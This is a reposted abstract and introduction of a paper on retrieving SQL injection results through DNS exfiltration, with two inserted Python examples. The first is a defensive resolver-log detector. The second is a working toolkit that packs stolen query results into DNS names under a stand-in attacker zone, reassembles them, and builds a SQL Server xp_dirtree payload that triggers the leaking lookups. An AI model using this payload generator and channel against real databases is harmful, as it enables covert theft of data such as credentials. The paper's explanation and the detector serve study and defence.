Nytro

Data Retrieval over DNS in SQL Injection Attacks

Data Retrieval over DNS in SQL Injection Attacks

Miroslav Štampar

AVL-AST d.o.o., Zagreb, Croatia

miroslav.stampar@avl.com

Abstract

This paper describes an advanced SQL injection technique in which the DNS resolution process is exploited to retrieve the results of malicious SQL queries. The resulting DNS requests are intercepted by the attackers themselves at a remote name server under their control, from which the valuable data is extracted.

The open source SQL injection tool sqlmap [1] has been adjusted to automate this task. With these modifications, attackers are able to use the technique for fast and low-profile data retrieval, especially in cases where the other standard techniques fail.

Introduction

Exfiltration is a military term for the removal of assets from within enemy territory by covert means. It now has an apt modern usage in computing, meaning the illicit extraction of data from a system. The most covert data extraction method is considered to be Domain Name System (DNS) exfiltration [2]. This method can even be used on systems without a public network connection, by resolving domain name queries outside the perimeter of trusted hosts through a chain of internal and external name servers.

DNS is a relatively simple protocol. Both the query made by a DNS client and the corresponding response provided by a DNS server use the same basic DNS message format. With the exception of zone transfers, which use TCP for the sake of reliability (and of responses too large for a single datagram, which fall back to TCP), DNS messages are encapsulated within a UDP datagram. To someone monitoring a machine with a tool like Wireshark [3], a covert channel implemented over DNS would look like a series of little blips that flash in and out of existence [4].

The act of relaying DNS queries from secure systems to arbitrary Internet-based name servers forms the basis of this uncontrolled data channel. Even if we assume that connections to public networks are not allowed, if the target host is able to resolve arbitrary domain names, data exfiltration is possible via forwarded DNS queries [5].
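The "little blips" are not invisible to a defender who keeps resolver query logs. The following is an added example, not code from the paper or from sqlmap: a small check over BIND-style query-log lines that flags an apex domain receiving many distinct, hex-looking subdomain lookups. The log lines are constructed for the example and x.attacker.example is a placeholder zone.

```python
"""Added example (not from the paper): a resolver-log check for the kind of
DNS channel described above. Log lines are constructed in BIND query-log
shape; x.attacker.example is a placeholder zone, not a real domain."""
from __future__ import annotations

import binascii
import re
from collections import defaultdict

QNAME = re.compile(r"query: (\S+) IN \w+")
# A label made only of hex digits and long enough not to be a normal host name.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")


def build_sample_log() -> list[str]:
    """Constructed traffic: ordinary lookups plus six leaked table rows."""
    lines = [
        "client 10.0.0.5#51234: query: www.example.com IN A +",
        "client 10.0.0.5#51234: query: mail.example.com IN MX +",
        "client 10.0.0.7#40001: query: cdn.example.net IN A +",
        "client 10.0.0.5#51234: query: www.example.com IN A +",
    ]
    for i in range(6):
        row = binascii.hexlify(f"user{i}:secret{i:02d}".encode()).decode()
        lines.append(
            f"client 10.0.0.9#53001: query: {i}.{row}.x.attacker.example IN A +"
        )
    return lines


def analyse(lines: list[str], min_names: int = 5, min_hex_share: float = 0.5) -> dict:
    """Group query names by their last two labels (a crude apex; a real
    deployment would use the public suffix list) and flag apexes whose
    subdomains are numerous, unique and mostly hex-encoded."""
    per_apex: dict[str, set[str]] = defaultdict(set)
    for line in lines:
        m = QNAME.search(line)
        if not m:
            continue
        qname = m.group(1).lower().rstrip(".")
        labels = qname.split(".")
        if len(labels) < 3:  # nothing below the apex, nothing to carry data
            continue
        per_apex[".".join(labels[-2:])].add(qname)

    flagged = {}
    for apex, names in per_apex.items():
        if len(names) < min_names:
            continue
        hex_names = sum(
            any(HEX_LABEL.match(label) for label in n.split(".")[:-2]) for n in names
        )
        share = hex_names / len(names)
        if share >= min_hex_share:
            flagged[apex] = {
                "unique_names": len(names),
                "hex_share": round(share, 2),
                "avg_len": round(sum(map(len, names)) / len(names), 1),
            }
    return flagged


if __name__ == "__main__":
    for apex, stats in analyse(build_sample_log()).items():
        print(apex, stats)
```

The thresholds are deliberately loose and will need tuning per environment: CDNs, anti-malware reputation lookups and DNS-based blocklists also generate many unique subdomains under one apex, so treat a hit as a lead for packet capture rather than proof of exfiltration.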

When the other, faster SQL injection (SQLi) data retrieval techniques fail, data is usually retrieved in a bit-by-bit manner, which is a very noisy and time-consuming process. Attackers will thus typically need tens of thousands of requests to retrieve the content of a regular-sized table. The technique described here lets attackers retrieve the results of malicious SQL queries (e.g. an administrator password) by provoking specially crafted DNS requests from the vulnerable Database Management System (DBMS) and intercepting them at the other end, transferring dozens of resulting characters per single iteration.
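To make the "dozens of characters per iteration" concrete, the following added example (not the paper's or sqlmap's code) models the channel end to end in Python: the result bytes are hex-encoded and packed into DNS names within the RFC 1035 label and name limits, the attacker's name server reassembles them from logged query names while tolerating retries, reordering and case changes, and one helper shows the stacked-query T-SQL shape that makes SQL Server perform the lookup via xp_dirtree on a UNC path. The zone x.attacker.example, the sample table rows and the T-SQL template are assumptions for illustration.

```python
"""Added example, not code from the paper or from sqlmap: the DNS channel
described above modelled end to end. The zone x.attacker.example, the sample
rows and the T-SQL template are assumptions for illustration."""
from __future__ import annotations

import binascii

MAX_LABEL = 63  # RFC 1035: a label is at most 63 octets
MAX_NAME = 253  # longest text name that fits the 255-octet wire limit
ZONE = "x.attacker.example"  # assumed attacker-controlled zone


def encode_result(result: bytes, zone: str = ZONE, label_len: int = 60) -> list[str]:
    """Split a query result into as few DNS names as the limits allow.

    Every name starts with a sequence label so the receiver can reorder, then
    hex labels. Hex survives case folding and 0x20 randomisation by resolvers;
    each label holds an even number of hex digits so any prefix decodes.
    """
    if not 2 <= label_len <= MAX_LABEL:
        raise ValueError("label_len must be between 2 and 63")
    hexdata = binascii.hexlify(result).decode()
    room = MAX_NAME - 1 - len(zone)  # characters left for data labels and dots
    names, pos, seq = [], 0, 0
    while pos < len(hexdata):
        labels = [str(seq)]
        used = len(labels[0])
        while pos < len(hexdata):
            avail = min(label_len, room - used - 1)
            avail -= avail % 2  # keep byte pairs inside one label
            if avail <= 0:
                break
            chunk = hexdata[pos:pos + avail]
            labels.append(chunk)
            used += 1 + len(chunk)
            pos += len(chunk)
        if len(labels) == 1:
            raise ValueError("zone leaves no room for data")
        names.append(".".join(labels) + "." + zone)
        seq += 1
    return names


def decode_queries(seen_names: list[str], zone: str = ZONE) -> tuple[bytes, list[int]]:
    """Reassemble the result from names logged at the zone's name server.

    Tolerates duplicates (resolvers retry), out-of-order arrival and case
    changes; unrelated names under the zone are ignored. Returns the bytes
    decodable from the contiguous prefix plus the missing sequence numbers,
    so a lost chunk can be re-requested instead of going unnoticed.
    """
    suffix = "." + zone.lower()
    chunks: dict[int, str] = {}
    for name in seen_names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        labels = name[: -len(suffix)].split(".")
        if not labels[0].isdigit():
            continue  # e.g. the NS lookup for the zone itself
        chunks.setdefault(int(labels[0]), "".join(labels[1:]))  # first copy wins
    if not chunks:
        return b"", []
    missing = [i for i in range(max(chunks) + 1) if i not in chunks]
    end = missing[0] if missing else max(chunks) + 1
    return binascii.unhexlify("".join(chunks[i] for i in range(end))), missing


def mssql_payload(inner_query: str, zone: str = ZONE, offset: int = 0, width: int = 60) -> str:
    """Stacked-query T-SQL that leaks `width` hex digits of the result,
    starting at hex `offset`, as the host part of one UNC path.

    Assumed trigger: xp_dirtree resolves the host before touching the share,
    and fn_varbintohexstr returns '0x...' (hence the +3). Both are widely
    documented SQL Server behaviour, not something quoted from this page.
    """
    return (
        "DECLARE @h varchar(2048), @p varchar(512);"
        f"SET @h=master.dbo.fn_varbintohexstr(CAST(({inner_query}) AS varbinary(1024)));"
        f"SET @p='\\\\'+SUBSTRING(@h,{3 + offset},{width})+'.{zone}\\a';"
        "EXEC master..xp_dirtree @p;"
    )


def build_sample_rows() -> bytes:
    """Constructed stand-in for a users table dump; not real data."""
    rows = [f"user{i}:{i * 2654435761 % (1 << 128):032x}" for i in range(8)]
    return "\n".join(rows).encode()


if __name__ == "__main__":
    dump = build_sample_rows()
    names = encode_result(dump)
    # What the attacker's server would log: reordered, one retry, one NS lookup.
    logged = names[::-1] + names[:1] + ["ns1." + ZONE]
    data, missing = decode_queries(logged)
    print(len(dump), "bytes in", len(names), "lookups; missing:", missing)
    print(mssql_payload("SELECT TOP 1 name FROM sys.databases"))
```

The sequence label is what makes the channel reliable rather than merely covert: resolvers cache, retry and reorder, so without it a duplicated or lost lookup silently corrupts the reassembled value. In a real injection the offset in `mssql_payload` is advanced by `width` on each request, which is the per-iteration transfer the paper refers to.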

Download: http://arxiv.org/pdf/1303.3047.pdf
